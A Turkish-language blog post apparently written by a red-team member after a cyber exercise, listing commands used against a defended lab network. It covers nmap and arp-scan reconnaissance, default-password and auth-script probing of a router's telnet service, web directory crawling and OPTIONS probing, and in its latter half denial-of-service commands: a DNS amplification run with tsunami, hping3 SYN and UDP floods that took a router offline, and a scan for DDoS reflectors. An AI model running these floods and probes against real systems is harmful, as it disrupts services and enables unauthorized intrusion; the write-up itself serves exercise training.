Korunmalı Ortamlardaki Sızma Testlerinde Kullanılmak Üzere Bazı Komutlar ve Parametreleri

Kısa bir zaman önce uluslararası bir siber tatbikatta kırmızı takım üyesi olarak yer alma fırsatı buldum. Görevimiz, güvenlik duvarı ve saldırı tespit sistemleri tarafından korunmakta olan bir ağ ortamındaki mavi takımlara saldırarak sızma testi yapmaktı. Bu ortamda kullandığım bazı bilinen komut ve yararlı parametrelerini sizlerle paylaşmak istiyorum:

Sızma testinin ilk zor aşaması, çalışan host bilgisayarları ve üzerlerinde çalışan servisleri tespit etmektir. Bu kapsamda kullandığım en işe yarar nmap parametresi, taramayı özel bir port üzerinde kısıtlayacak şekilde olandı:

nmap -sP -PS443 192.168.10.* -oN 192_168_10_443.txt nmap -sP -PS80 192.168.10.* -oN 192_168_10_80.txt

Tabi ki buradaki port taramanızı hedefinizin özelliğine göre tanımlayabilirsiniz. Eğer FTP servislerini tarıyorsanız 21, e-posta hizmetine bakıyorsanız 25 ya da chat sunucusu tarıyorsanız 5222, 5223 veya 5269 portlarından birini kullanabilirsiniz.

Diyelim ki 192.168.10.130 IP numaralı bilgisayarın canlı olduğunu tespit ettiniz. Bu aşamada, daha derine kazmak için, TCP SYN (NO PING seçeneği ile) taraması yapabilirsiniz:

nmap -sS 192.168.10.130 -Pn

Ayrıca diyelim ki bir yönlendiricideki telnet hizmeti erişilebilir durumda. Öncelikle bu makinenin işletim sistemi hakkında bilgi almak isteyebilirsiniz (-O ya da -A parametresiyle):

nmap -A -v 192.168.8.1

Ardından varsayılan parolaları sistemin modeline uygun olarak deneyebilirsiniz. Ayrıca nmap aracının yetkilendirme ve giriş scriptlerini çalıştırabilirsiniz:

nmap –script=auth 192.168.8.1 -p 23

Ağ cihazı tespitinde kullanabileceğiniz diğer bir yöntem ARP SCAN yöntemidir, bu araç korunmalı ortamlarda oldukça verimli sonuçlar dönebilmektedir:

arp-scan 192.168.0.0/16 –interface eth0 > 192.168.10.0.txt &

Arp-scan ile ağ ortamının cihaz haritasını bu şekilde çıkarmanız mümkündür.

Diyelim ki hedef ağda web sunucuları bulunmakta. Tabi ki Nikto ve NetSparker gibi araçları kullanmak faydalı olacaktır. Ama öncelikle klasör içeriğinde nelere erişilebiliyor görmekte fayda var:

wget -r -np -nH –cut-dirs=3 -R home.php http://192.168.8.121/cybersphinx/index.php

Devamında ise OPTIONS seçeneğini incelemek (belki de PUT ile dosya koymak mümkündür) faydalı olabilir:

curl -X OPTIONS -v http://192.168.8.121/cybersphinx/index.php

Mavi takımlar bu tarz oyun ortamlarında genelde bilinen servislere daha çok odaklanırlar. Bu noktada daha az bilinen servislere yönelik saldırı vektörleri hazırlamak kırmızı takım açısından oldukça anlamlı olabilir. Söz gelimi, ortamda bir SIEM çözümü varsa Elastic Search exploit kullanmayı düşünebilirsiniz, ya da bir chat sunucusu varsa XMPP açıklıklarına ağırlık vermek anlamlı olabilir.

Nihayet tatbikatın son bir saatinde her türlü atış serbestti. Hedef ağa karşı yıkıcı komutlar kullanmamıza müsaade edilmişti.

Bu noktada DNS Yükseltme (Amplification) ve Hizmet Dışı Bırakma (DOS) saldırıları verimli sonuçlar verdi. DNS Yükseltme için web sunucusuna karşı tsunami isimli aracı kullandım.

./tsunami -s 192.168.8.121 -p 100 -f recursive_dns.txt

Bu komutu çalıştırırken diğer bir komut ekranından hping komutuyla yanıt trafiğini takip etmek (hping3 192.168.8.121) faydalı olacaktır.

Hping komutunu DOS amaçlı olarak da kullanabilirsiniz, aşağıda chat sunucusuna karşı kullandığım bir örneği bulabilirsiniz:

hping3 -c 1000000 -d 1000 -S -w 64 -p 5222 -i u1000 192.168.8.166

Yönlendiricilere doğrudan saldırmak da güzel bir saldırı vektörü oluşturabilir. Ben öncelikle nmap ile UDP servislerini taradım:

nmap -sU 192.168.8.1

Yönlendiricide 67 numaralı portun açık olduğunu gördüm. Bu noktada hping komutunu kullanarak yönlendiriciyi (birkaç defa yeniden başlatmayı gerektirecek şekilde) devre dışı bırakmayı başardım:

hping3 –udp -p 10000 –destport 67 –flood 192.168.8.1

Benzer şekilde aşağıdaki komut, UDP servislerindeki DDOS yansımalarını getirmektedir:

nmap –sU –A –PN –n –pU:19,53, 67,123,161 –script=ntp-monlist,dns-recursion,snmp-sysdescr 192.168.8.0/24

Bu tarz oyunlarda kırmızı takımlar tarafından kullanılabileceğini düşündüğünüz diğer pratik komutları her zaman benimle paylaşabilirsiniz.